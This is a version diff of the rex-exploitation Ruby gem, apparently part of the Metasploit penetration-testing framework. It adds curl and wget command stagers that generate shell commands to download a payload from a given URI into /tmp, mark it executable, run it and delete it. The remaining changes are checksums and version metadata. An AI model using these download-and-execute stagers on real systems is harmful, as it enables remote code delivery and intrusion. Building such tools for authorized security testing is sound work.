rex-exploitation 0.1.5 → 0.1.6

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 8c3aa40c7752d6454ad471829bbd68a1128eaffb
-  data.tar.gz: 60c827e7efa8f980112e457a79734f4ca1db14d4
+  metadata.gz: 80afdc8e550167ae91e8e08edd84a2740556cfba
+  data.tar.gz: 5ddda4d0ea91af79b9847b1f1d36a2b8c3c61d8b
 SHA512:
-  metadata.gz: ee3c1d1aa91fa76fa5a6d74d33f4742cbdc9e8fb4e0e28092ce8d4dbf47c58e7c50f112c2c42606d5785882e4c64a62a0d7efc898866efd77cded938bc5fb7be
-  data.tar.gz: b8bf736891ac1c6d1e045b84df46136f9f29ac29d45ad02f2494b795bd35a067b42d82c2c0d1a3713eaf99da4d426ac1a5f208ba08154493cc295d57d48de51e
+  metadata.gz: e584e169273b66bd8ed80828e6dd438dcd30e086cbc66ede2ae119ef3b8a13304ea7ef9db096bd717d033b4d636540e626bf81a58dc57855b0aa02ed8b6aefa6
+  data.tar.gz: 9c21de05b924fda0a016019aaf67a460395c1601ad0dbee116ebaf670aad72e2c2e958e4617f29cb35b1a24d9d2fb49e6b7a8101f130b0fb6a7e97ccc50368da

data/lib/rex/exploitation/cmdstager.rb

@@ -9,3 +9,5 @@ require 'rex/exploitation/cmdstager/tftp'
 require 'rex/exploitation/cmdstager/bourne'
 require 'rex/exploitation/cmdstager/echo'
 require 'rex/exploitation/cmdstager/printf'
+require 'rex/exploitation/cmdstager/wget'
+require 'rex/exploitation/cmdstager/curl'

data/lib/rex/exploitation/cmdstager/curl.rb

@@ -0,0 +1,26 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
+
+  def http?
+    true
+  end
+
+  def compress_commands(cmds, opts)
+    if opts[:payload_uri].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
+    end
+
+    opts[:temp] ||= '/tmp'
+    payload_file  = opts[:payload_uri].split('/').last
+    payload_path  = opts[:temp] + '/' + payload_file
+
+    cmds << "curl -ko #{payload_path} #{opts[:payload_uri]}"
+    cmds << "chmod +x #{payload_path}"
+    cmds << payload_path
+    cmds << "rm -f #{payload_path}" unless opts[:nodelete]
+
+    super
+  end
+
+end

data/lib/rex/exploitation/cmdstager/wget.rb

@@ -0,0 +1,26 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
+
+  def http?
+    true
+  end
+
+  def compress_commands(cmds, opts)
+    if opts[:payload_uri].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
+    end
+
+    opts[:temp] ||= '/tmp'
+    payload_file  = opts[:payload_uri].split('/').last
+    payload_path  = opts[:temp] + '/' + payload_file
+
+    cmds << "wget -P #{opts[:temp]} #{opts[:payload_uri]}"
+    cmds << "chmod +x #{payload_path}"
+    cmds << payload_path
+    cmds << "rm -f #{payload_path}" unless opts[:nodelete]
+
+    super
+  end
+
+end

data/lib/rex/exploitation/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Exploitation
-    VERSION = "0.1.5"
+    VERSION = "0.1.6"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.5
+  version: 0.1.6
 platform: ruby
 authors:
 - David Maloney
@@ -88,7 +88,7 @@ cert_chain:
   G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
   8mVuTXnyJOKRJA==
   -----END CERTIFICATE-----
-date: 2016-12-28 00:00:00.000000000 Z
+date: 2016-12-29 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler
@@ -253,12 +253,14 @@ files:
 - lib/rex/exploitation/cmdstager/base.rb
 - lib/rex/exploitation/cmdstager/bourne.rb
 - lib/rex/exploitation/cmdstager/certutil.rb
+- lib/rex/exploitation/cmdstager/curl.rb
 - lib/rex/exploitation/cmdstager/debug_asm.rb
 - lib/rex/exploitation/cmdstager/debug_write.rb
 - lib/rex/exploitation/cmdstager/echo.rb
 - lib/rex/exploitation/cmdstager/printf.rb
 - lib/rex/exploitation/cmdstager/tftp.rb
 - lib/rex/exploitation/cmdstager/vbs.rb
+- lib/rex/exploitation/cmdstager/wget.rb
 - lib/rex/exploitation/egghunter.rb
 - lib/rex/exploitation/encryptjs.rb
 - lib/rex/exploitation/heaplib.js.b64